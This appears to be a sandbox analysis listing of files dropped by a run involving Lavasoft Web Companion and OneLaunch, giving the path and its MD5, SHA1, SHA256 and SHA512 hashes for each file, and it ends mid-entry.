| MD5 | a9ead6d0c1a1f85cc0860edfca8bb516 |
| SHA1 | 715295c95c5e43b90459bd0881b75ff0d96264b8 |
| SHA256 | b867d2160e14dce9399b6e14c171c6e83eb87522ef5043b37d46d0c306c1126e |
| SHA512 | 0b94c46eae940f4055e38f2b0c6a6369f0dba98ff5c1ed6ebacbbcda6435e5ccef969374f370173ad996a75259f614434cb06b48af79d06cd0ca2c23fee0582d |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\oh0n0qhq.newcfg
| MD5 | b312daca1664e22097c8ce9829d77ee4 |
| SHA1 | d3280d10bb4b4884e649d93f418d982954f0f959 |
| SHA256 | c8ce8f73f8212d59ada1aa4b29bfc64ae3266ed7dd830d94a21c8871bcca2707 |
| SHA512 | 37eeda2f1451f5fc95bfddb8dd7dab0aee5ff3f3025f8e758a2f442f0d8b06ed0c0515395be71682bebd58a689833152d48355e07127e0a8c6775a374a637077 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Code Cache\js\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\ce5be573-9ecb-48cf-b205-7a7dbf9fddbe.tmp
| MD5 | a3521925004fbbbec5a0818595eadeb4 |
| SHA1 | f59ad7f16254402c91d2c83b3307f9d4ee0b1f86 |
| SHA256 | 2361a312323d45991cef2ab16c8674c775e196e241c4b42ad0506c481b1b2022 |
| SHA512 | 78aee5267af2084fe839d774b8b0fa0a55008652f039ced988d7c29f35a4ae924efe5384478a25d41d7255d5f76eac3608229ccbec4516c2a73cfc60a478b24e |
C:\Users\Admin\AppData\Local\Temp\653E0C5.tmp
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Temp\653E2EC.tmp
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009
| MD5 | 923a543cc619ea568f91b723d9fb1ef0 |
| SHA1 | 6f4ade25559645c741d7327c6e16521e43d7e1f9 |
| SHA256 | bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd |
| SHA512 | a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555 |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\xap1qsvs.newcfg
| MD5 | 45e8cece7e1e56cd87ec64a6c2d8dcd6 |
| SHA1 | fcf2dac05449444243177205bcd5826acf348443 |
| SHA256 | 282fd612738a31f6fca3ed34e86b438d6f02903192be2baa0123c74a6a692779 |
| SHA512 | 62ecaff52fab3c8cc3ec1f4feab48b778b9d75efbc51734d52d21adb5a5e5c5cb1dfdecdd9dc036a7c2affad3a6eb3bf487ecd03e962dc72dbfc8a2574fd4068 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 8426717b2d5c25f1c52ae1687539c9b3 |
| SHA1 | f29b77bae3e9869464b935c0e914fcc003babe14 |
| SHA256 | 1a2745deb90a38767c9d7ec6ca26851ffc44be95b91297a55de9edad2bd92af2 |
| SHA512 | 53f7d7f6f9b6fee27f5f5328008412ac7c6590250a3e06552e253fc830fdb194696abb671ff34e4768ed53d2cc6f5b8cbf0948435970ec6044debbdd58c4cc60 |
C:\Users\Admin\AppData\Local\Lavasoft\Web Companion\Logs\Webcompanion\webcompanion.log
| MD5 | 015057d1a0608d17603789b032aeebcf |
| SHA1 | a469d36f72b02b05b94f913b572ba7ab8985a625 |
| SHA256 | 1f59930280815b2ca3994a3337051d10f3152e57733fccf8842b7b1da63a58fd |
| SHA512 | 30213750ed19b2883ff86c67391e6baef89fd9084c757d7d28580418c303aeb335adf37a148ba637eed322290d123551891a575842ce1fac59af2b8614a09547 |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\mrgo4zcy.newcfg
| MD5 | f5e7699fba465807d1a0d250b99c40ac |
| SHA1 | 096280698b9bb037b4683f5531420664284a61de |
| SHA256 | 9e15535e8e2782aeb47b4501bd73677136f43525123ae15f158eb87e5e042d2a |
| SHA512 | 00f06573b2e2fc75186c593054c56163b2f8ecbf578569ea4df1cd8610278a1cbcf54aeef03be20575c62d503b99565e8cab59f28f60dd42d82e86a57a2db70e |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\wzpr14tg.newcfg
| MD5 | d06625eab394ad6bc9f2998683f357ed |
| SHA1 | 7661558dcef366bd3389afb7bfc11a668e475bef |
| SHA256 | 06b4df84b0cbe69b9d3cb65af76d4a7aaab645829db76f21cd1abb8f9ced105e |
| SHA512 | ae4834c5854396cb76a57e5ef001f152d5b019e1b20229b628ffbd014d64142fb4f57caf0a7d2f47455d96f56eb6e892b5045aa0aa01101230dad6dd969555c0 |
C:\Users\Admin\AppData\Local\Temp\7c8b9257-b1b6-497f-bfb4-dc8db27a566c.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\extensions\gcklppdiegejnfnpepkaagjmdneobkgi.crx
| MD5 | 383350ae7d36120b7efb84baeabd016d |
| SHA1 | 5b4365b465138da1702bb548bc3e20ddf907feb5 |
| SHA256 | 762dd5d2bc2a62b8fef6e1b630a5734777df596a1a3175ed4d952c6470c5f2d4 |
| SHA512 | 59cab09ed1bcdc5362c5fcd751bc3c0f3afb25c046c9cadb7458c723b3ea40b2d12fc1c0db8b46b24a7f773c8eee2f2f981d357c7549f3294d3e188cd5d23398 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Local State
| MD5 | c6b5f1310de3e7cb1d8475534d93d3aa |
| SHA1 | 67b6dc12ec8d138db3eb6ff6ef32b02fb7e18eb6 |
| SHA256 | 22947ff0b248e98ede5c8dad2e2d3ccb16555e60ef6eec14a97dec4b8671962e |
| SHA512 | 9d6aa5eb7dd8ceb208531702296f63770cea60c5c2c6b0851912573aeba920be682db69da80b209dd454a20d8c62896404e8b954a4f5d8adbbe0ec93ada391e3 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Cache\Cache_Data\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Cache\Cache_Data\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Cache\Cache_Data\data_1
| MD5 | 7bfd5c020a3a270078efe22cd9802555 |
| SHA1 | 42e1b2e3c77e8c583962408e411dca5fd0a3745c |
| SHA256 | a6e22135799c41d7ece715fc2b9d3cdb3f17bb606290931100bb1e5245983f90 |
| SHA512 | 398fef782a53376b97a9aed122c7d97f462d2c05c49dcd207e043d58650401de0935b71a0410a876efbb6f4f2cefce90d1723db8c88f8f36756ee4349b084a47 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Cache\Cache_Data\data_0
| MD5 | 0583f05f42d41afcc34a8072d6ac80e8 |
| SHA1 | c5f65f2f243c9833a298997bb5a6d0d6fe527634 |
| SHA256 | 69342be04633043040fd895bed8a4ecf318ede03d713b2ad45d181e218676240 |
| SHA512 | 4e25e1404486aefc116ff2ceb27535669c030a3dad0629f3c516113670728298af8fe88229b85b13b6baa04c800a20301966572c40b11ead673bc8ffb3aa0ba7 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Preferences
| MD5 | a72c018ab2052c2acf239125699b5563 |
| SHA1 | 0130aa49b9f7818552e24a77d28b6485811837b2 |
| SHA256 | f904c77779fd77755234ffb09b3130fab0034a972ae6e7eb0eefbf00559c2dbf |
| SHA512 | 2f5904eb313e21bd9c44649ddee2ae9dbf59caaa929b0f46e3e9a52fc4621e04aba8ee4d0ec0be10c7501ca05b363224854a6234fb8b72e182905df47796abfd |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Preferences~RFe6000cf.TMP
| MD5 | 9d790ccc5a8a209c221cccb24b819d5c |
| SHA1 | f7a5665baec0ec61d4db3deb4d1bfb6635131464 |
| SHA256 | f8b0f1f9f994660ed8f39d0cb5b51b4bc5b096b4518c3c7a913674572a879136 |
| SHA512 | 66f3211f54fda3cd26956e21a9ed1bd4fa4c0e0347ebc2d742a5ffa0ea9b28e49ae02cd94a52352ea0d3a11bf156ab8accfc82d972d5336d13b91a40dff15981 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Local State~RFe5ffff4.TMP
| MD5 | 3023c7ac23bc3cf0c65b23dcce223dad |
| SHA1 | 0a618bc942747ea185651875199d23f6017ad122 |
| SHA256 | 4b755e43841e81ae703a0bab89b341e55d3a789d655333e41001713af4aa5b40 |
| SHA512 | e8e7e408adf4838da46ff483c2e0d16d49419730e13f1abcd44666a839ed3a6ce342258660fbe57317df621371f52017f5e7d23c415b04ba145750fa69eece33 |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\lqxhbnhd.newcfg
| MD5 | 7b2c681ff48bd4c97de0553b6ab6b12d |
| SHA1 | f2206064d9a6f076e7a1c3e5d10ac9b0e46123b6 |
| SHA256 | d6358433d98bf2283473c12c4d49ca88e121b10e165f4e6794966a4f7c8bc62b |
| SHA512 | b502dbfd99df800e59d33d0c950065432c970513deed5c7f3b390641c859a8f3e80c38e1f198958df44696619e81aedfb8703f9c00f96d40550d916af8c0bd46 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3b81c89c5e248f0ba9cab4861a64acd8 |
| SHA1 | d4cd272171b165b8f2a3f4b92dee6e6ab0c6e7e7 |
| SHA256 | 2806271f19bb6b2df1d0677c9a647be6a295ed38f536ec06301e32e9f27e258c |
| SHA512 | d8895f15898e13a368619a239980083236a06c98fbedd8254bdbfab589986919f42a3292aca181c8f33aee21f66695551f32cc014bf4e0443d811e2a5a49dfc4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 313d815a57b106c8e29e14942b060e11 |
| SHA1 | 089992f7cda824f8a70f264220479426d3ece8b6 |
| SHA256 | 955d70ff6cf2f704f3ceefdae0d651549058f6576e6d377eb7feec1eaadcc8f8 |
| SHA512 | 35b0376dd7c6aba887a4e19102385ef95f7c44f79bca15c1e6067a70fe6de4f0faec75a56a9674c360e38a8e237395325c9f4aa6dc75811973f5d0e8b802de53 |
C:\Users\Admin\AppData\Local\Temp\f90686bb-cbf5-4284-92b9-90b82a6a4a36.tmp
| MD5 | 034ce0c40d7bcefb3e6b5bdf3480bce7 |
| SHA1 | 3b19e399d7b2cbd4f3b8a7dd17d8b4a3af839e53 |
| SHA256 | 93def3fa90190d2434bd74843575f4cccb634ba8481dfba5520815e01cf2325f |
| SHA512 | 9304cc186fee44ea84759530be33da9f45d702878823fc5c64e15bb39fa28c3be0a942593e9e43bdf2af9376bb2fa7717b942aa494dbc345a6e00c3362b21061 |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\3p435y4k.newcfg
| MD5 | e213772cae19d2f1a4bb30209d77a8c3 |
| SHA1 | d4b2f701193515cffb97641b2c6181adcd442b2c |
| SHA256 | 2fc9ebc6e35152a2fa2d02258aaa749a33b912b60cffa50b0c92816491ddcd9c |
| SHA512 | 78ae001f883bd553ba0fce955bf5a47ebfe8cf196a88b0ce4f003ff0e6d2d8fc95948de05c7b0576e4fb9a4aa30b1fa5c2516e7cc8843c9633022b0bd30a338b |
C:\Users\Admin\AppData\Local\Temp\scoped_dir6068_867788808\CRX_INSTALL\src\contentScript\globalInjector\index.js
| MD5 | fe07a602fcdc55732a567bceda208e17 |
| SHA1 | cded2eae412bfc40d31e8285e3fae7bbd995bb69 |
| SHA256 | d459db412275bd93229a3c44dd4acef7c5880b35fa50732f76114a2378fcb5e2 |
| SHA512 | a8b49dbb4dbc184332fa4dc1b03f7664a09939cfd472bbf772bf411c5ed1e01a251e628246484a2ab35144b3f97f25c8818304346a7b392108c33b4b3347fdef |
C:\Users\Admin\AppData\Local\Temp\scoped_dir6068_867788808\CRX_INSTALL\src\contentScript\globalStart\index.js
| MD5 | 97c06edc57360ed9d8ced96ffb10c265 |
| SHA1 | 00778a6df29f8c34f4b66472d9c9c905577c2613 |
| SHA256 | 8eff34dd1eaeac24aeb9e385dd77a69eae9fb975400389ecce6b73a5385c2dd4 |
| SHA512 | b25dde0368501e7935e0d177009dbd5e91288bf648407a958d715f62e7df19fc67a60ca9597a3c938a0f3d12c10559b53f25c58e50d49db50145b9475d4e75df |
C:\Users\Admin\AppData\Local\Temp\scoped_dir6068_867788808\CRX_INSTALL\src\contentScript\slickdealsDealDetails\index.js
| MD5 | 6f13fe2d9ad6c6dca797c4aaa7ea520c |
| SHA1 | 33abd608ce8c6687c0930776c4bdd252b6e03ce7 |
| SHA256 | 120fcbc0bb7e09aee7f2dda95f2cde930c3379878c27fb96e0a21b92b1114b11 |
| SHA512 | 9823a2321acd4cc37a6cae09e2b5817690efa1f923ef01220291194f5fa40fa615ebc384a9eecc9126fea2567750179e349ee21d14aaf423705ee5fd872cad92 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir6068_867788808\CRX_INSTALL\src\contentScript\slickdealsIdle\index.js
| MD5 | 4df3facc60197e3c00afaa676a844367 |
| SHA1 | ccf1df4c665eba566276fc833da0d48490dfef8f |
| SHA256 | ab2270fbfea2cc9a9e871abafa5d152003d460591cd96bed34c4b90666e1ed29 |
| SHA512 | 87c5d67fc5bcb016b7f85523e3073cc963293632a152f93a8d61b9ca6ff6f851e22de9568de77eb2c8a90aae6d395530a2acddc99c353beb2d624512f0f0befb |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Temp\scoped_dir6068_867788808\CRX_INSTALL\assets\src\contentScript\slickdealsStart\index.a0908cfc.js
| MD5 | 19cc33d58ec9e3d42825a814b8d9063b |
| SHA1 | bce43d7ab37440ebb87f9822f2f7ca77aaa79b6b |
| SHA256 | dc57439f8f8747f3b55ce505ed1937e915b9011c697b0bc29b0b2848fb4b0df5 |
| SHA512 | b278f43bbb7d0eea8dc982d157bea877d43b0d57231ff2cd146696e072392ae6c4a6bb9c6bfb46545af74c8cc73c1fa572a0abb704e6aac9c06722f40c6b9a07 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\icons\16.png
| MD5 | f7964407d8460444ac479a39866b8291 |
| SHA1 | 1f07f558e639f507ef5c0a3d15c5567f43ce09e7 |
| SHA256 | 1206d28eb2995f94cfdc64db6837704999b16a68536b097bdc2a7b2c6ec27f26 |
| SHA512 | b063f81ee01787bf27b7ce3078d0d620e2ba52dbfdfbd43ed9929722ce7e27abca3df63370b9778d5d1ee5400b7d83b1cbcacc8369dcc329bfcd17cef82bee82 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\manifest.json
| MD5 | bd71d16d73d457de9c55312b53458b5b |
| SHA1 | c99af7188e136fdc6fc59144e77ff21df0cc8d0c |
| SHA256 | 7189850ed2f8e830153634e7fc936d5ab3f0eed9a5d1408c57ee750d07f4829d |
| SHA512 | a4bba3c470c7306035fc2c14352fb37a6a9dd80bb0b11c9a936bf9c4bfe6317270512f7626d3ee480e4f9f4ad272b6c4a58845fb792b0cd714eaecb8ab3b3ccb |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\serviceWorker.js
| MD5 | 02bc07d152eacaffe4a31e667d9fbd0e |
| SHA1 | f22c58599db466522eb70606fd9187bd59cd6b01 |
| SHA256 | 85c8d0928c6ba30ea4ee87f5f39e001876acab70acd155e16d088f3a56878e97 |
| SHA512 | 0eea4cde4b673a42926e6601741205637869593d3ed9dc65b3f6a40f2ac61c3b9391cd7b0f75036a1e091eee4a3ed0c73e2cd2f9cffd2ba973c76a92c880842a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 041b07d9ac100895ff73bd3e9ab6d301 |
| SHA1 | d06f5fea81ca11761ce5a0b51bd27ad26720f3b6 |
| SHA256 | b713fccf7e40417e454c01496f36c74c521c28b9e415653ae23d446337243f19 |
| SHA512 | fb6c94de1f5794672439166081ed5614b86b55b3d99373e415223c0580efd8c1fb739365261957a84b6451eae055a63c235a9b1351bcd408b4ad0f7fdab85090 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Local State
| MD5 | de84375a343830c2cf7b59e13d6e27da |
| SHA1 | 32f26c8274d307da834bdb08df30bd9458b0e859 |
| SHA256 | cd848c7f3df0654ae9a687f1012561ed84a1dc16c9775e7a3c70ce9b766bcb3f |
| SHA512 | 53711d1c0774e917491dfb8be15ed20e96f3ce39539d3a122057a604d56c2773dc319eddd77bae167c77a9e048b22d6d9c3e3d8b3dbab95b5995d655ae547844 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Preferences
| MD5 | 3ce5f43f291eada4fcd4f0b5bba22756 |
| SHA1 | d1dc5408a08206ea97bfd7c891cc10c7a85fca34 |
| SHA256 | b6107350c0758868b9d6c543ec1b81f6a8ea9c72868a272105f4c21039b03b6d |
| SHA512 | acb24474ffae13996ca773c90120364ea912032d76c1924dba5f455f1a2c46bdad00988fecd4136dbd416c621a8cd9e39c346946ea8da517350d20d14153e25b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 823b7c10a87dbed64d326365ac2af950 |
| SHA1 | 187f931e52552bd8657b96ac0e9a0f8ed7c57042 |
| SHA256 | 894e30140e72511611241c7484ae915699ff316e9ee0a7eda66c4a6c2e8936cd |
| SHA512 | 9004424ce184737048718b7f7e3d72dfcf47baf419ad9890eb566d78b97a084fb56e18b732c4946db6cc247aea9d6a14fb7d52c4febb236c171349e76ef8ccfd |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Secure Preferences
| MD5 | 93eae13ea7abfa3babc7302d8840f9de |
| SHA1 | ff45fc73dc532cb4c237a2b462a144965f588296 |
| SHA256 | 8e9430833925ab43d77048195b455a18b10ef9c72ccad2254ef6bd34adecc4ee |
| SHA512 | c70a1f6abbf292ef9f9655c2d858b127483130c0b27608c0ec5f214d627a6b55ff4c5fdeb965bd1b3c4fe5215d977c7292345ae2e96abb5a40a3f5ceedcd5628 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Secure Preferences~RFe6040c6.TMP
| MD5 | 829325bd863a5bb24a9ab3f6a436333b |
| SHA1 | b7a96a5ead7bd6c4194c0dba34988d2bf62ddfd3 |
| SHA256 | 557cca8be79854124e269a0a586667ffbfc02b32259b8a9452cacb1e27bb4493 |
| SHA512 | ee56d8d5acf89c364cffaf278838f34454435a963af73b88bc3a4d403b585a66c663534db30f753ed0bd6dfa0ad707b80f7d2d6127869715c7f25610a0c8498b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000ae
| MD5 | 92fa0c295bb27f3a111d46f3df9dde86 |
| SHA1 | a5795f48ebb03b92ec8b5895e461c6fba24de8f8 |
| SHA256 | f6393a84d2923f40eac6aa025511f1b0f36df99c4b345af72606df309a4a48b1 |
| SHA512 | c4460abb6026e57997c1fab702e68521d801c47f8560a6fa69e2aa2bb67684b68b7d750e7a12c240e3775da8f543f8aebf45e33b963c5cc00c710e2d397cefdd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000b9
| MD5 | 40641935a8af98f2d6d682e630320c16 |
| SHA1 | 0cdbfed40a2b45f8ce624505395aeed179f46f05 |
| SHA256 | b0eaec2fb7ccb04b9c0c6d70b8be25f05e25d507347734a44f48379ed596f342 |
| SHA512 | b7c00d4c35c7fbfb8659958a34506958b75ae5171638e85e1580aaa651fca7a9f336c0ef2b58977198f654d2a470dcd68c6d7716545d34eafbb8b6edc5acd49c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000bb
| MD5 | 4cf6ad1ca32d8b82fc4d5acad0f5a4c6 |
| SHA1 | 66040cff75e7a566199973734b576eedda20348f |
| SHA256 | a57005c8986d670ba810902b0ba801853cabb29f743fbf87a01dfa4e65c7c770 |
| SHA512 | 7e6f6789866d59a486e168ffbaf0b93ba23baa281bd23633a0c5984948c54fec448f726c8bfcff6c12e3a814ac5ee51d85107d758d0c16c09b7328809eaba47f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000ba
| MD5 | 08475cfd380edb2d2e9290e97b3da01b |
| SHA1 | bf77aa35534cbe99d892a7e24391bed6447d01f0 |
| SHA256 | 90143522192bd04a6c55e30fcad375a9e1c104a28d36246bf7562538dca40145 |
| SHA512 | 988ecfba1140ce754cb1d47be2249000196dfc30dc405fc733c4aeef71ca1ad88d13f324ee91689bd20c70ddd702104abfd85b831d4ed3177a40fc77e1727bb4 |
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Options\AppSettings.txt
| MD5 | 590fd86ad024f2b655deec8333e240a9 |
| SHA1 | f1946050248dd1aea834f139063ac8eb3e41677e |
| SHA256 | 7afe6a8c5bf14cace6e9bb2d40df2adb5f31325fc024f448138106cf7b63f7c1 |
| SHA512 | c19bf730552e548b6caaa27f5ff2c5b34d34ac9408b3b6e388361635ddfd4f619b9205fad76b9141f2804b8dd364cd843dcbabd4d9d7b7b712f320f6729d87ec |
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Options\WebProtectionConfig.txt
| MD5 | 0cb1cc6ebd3113ffa4d08cb8e611b0c1 |
| SHA1 | c084178a890875d41c400e8950537e1f8a58a50f |
| SHA256 | b578ec7cfe4cdf6690c83daa66b068fc585a8b35fc3a8722e29f2dc0fabb26e2 |
| SHA512 | c86f4c9a16249313e1a4e0561dc6241e931c5d382a830b64e3aa9d1447734716417bc2f08e4860edc0d2945cc5091170b90039194c90985395d33a36662fffec |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Local State
| MD5 | 18f71670e65e652991a5201361659513 |
| SHA1 | 82ea985f95f9cd55b5bbf6415a33c7286d730ad6 |
| SHA256 | aa9496602ca307cdd79c469515952f3d564438214d6399a6f354fe6695628a18 |
| SHA512 | f33ceba3e5ecab170e31bf653b8248d697d56e7f8194038d86efb05a597027dc4af5e5f609d02a9680bd50d855254e09d42664bf837b2deea85767bac1e9cb61 |
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Options\ActiveFeatures.zip
| MD5 | 475db3500f9b3cb9b52601a2209cf503 |
| SHA1 | 8729d64ec47b3e81613fc042b4add8377423a822 |
| SHA256 | 5f6ace1422db72c17e77c5525e94af5e6dba24c2c0ca6d791c77f51db10f1d65 |
| SHA512 | e8ac63c9015a08b4576587feefba8c1e5142e94852eabe5187800cdc345525d44d3e3240bae105fec5f3bca7a802b4bd7070564f6826c239f565561aecf5af3b |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\g4gegdoj.newcfg
| MD5 | 281f604b58007a9a94c63b08ca4c07a3 |
| SHA1 | dad9f64c12a4a3a78dc18acbe2593b2888284072 |
| SHA256 | add21e8244416e995b16e6f1b3aefc4b63f2f882df09bb2c2960b520596d8371 |
| SHA512 | 2fa8d80136bf2c8d818519cecdf58f4889d137ff8bcc237fbd321fbf1d03a55fb6c522f351dbd8468ccd0e50755157c26845749a90b0109d755fbd1abbf83a8c |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\ci0iyjn2.newcfg
| MD5 | c8cae43fd22440945b21686e77cb19b2 |
| SHA1 | 812ccc089740b1c015fc4d1c82cb79068afa79fb |
| SHA256 | a94cd42c2c278433de8178d99fe735e44fa478f9fd24fc314b32e5e455141edd |
| SHA512 | 23a90801c8f04d13ca12f6bf5f95d98f1c80664df6786f008036571edd383ee10c12ab215372f476f91e8fcfc6a002a7db0c0082971c2d29a1d6f02666f1388a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e2bbcf76d55765acc79d7011bd7ec7c2 |
| SHA1 | 5a3833908a4ebf26970a2684fde42f6d46e95b01 |
| SHA256 | 897d9cb722748d1a6d6d3ab1fe04591f48fb840dff8218b981e7572b423b0d3a |
| SHA512 | d2a878c52a0498321514db38277867b20a2497082c4a14f4e57e11440322ec6d7cc546c90cc457a2a97f4601f71e9970ee28fa26380a8db5ece30efb14bd8709 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Preferences
| MD5 | b06f60358724e8578d8fb0e2d7a8fa6e |
| SHA1 | 5b96d44873bc3fad00b278b851d38fb0f8e82f06 |
| SHA256 | b8cd7fa56b7a1e8b9086ad003b677f9541b64ccee6f92990312e645444592cae |
| SHA512 | 942f2284c01c6f5814f84c7b6f1f12f989fbfffdecb779bc97498e3f6e9639df3c9eea23ea860899399f22d64bbb43944d92ec13c81bfd6949e209cf40834646 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\hffgmnbojgnbalmhedkdikfhaflnfcno\1.9_0\bookmark.json
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 025a01ecbc836813d6ea438e17064e12 |
| SHA1 | 7b75474267555a81e4a2821d31e99e3086215059 |
| SHA256 | 7920412050a85471d8c703f6685be8d50257c6f5c2f99ab16d37965d6c68e6f7 |
| SHA512 | d458bb8f6eec14a1e82185e034cca60003bd31623b6c0d83f86fc7e818b72635bfbca60506ce5908771f84c71f5849bac5f5a2e224a141db80c2d303888b0223 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 29a0ec9e41522d6778e5962771b696a9 |
| SHA1 | 45f4855d79b9fd0c281b3ac081250bb69019b665 |
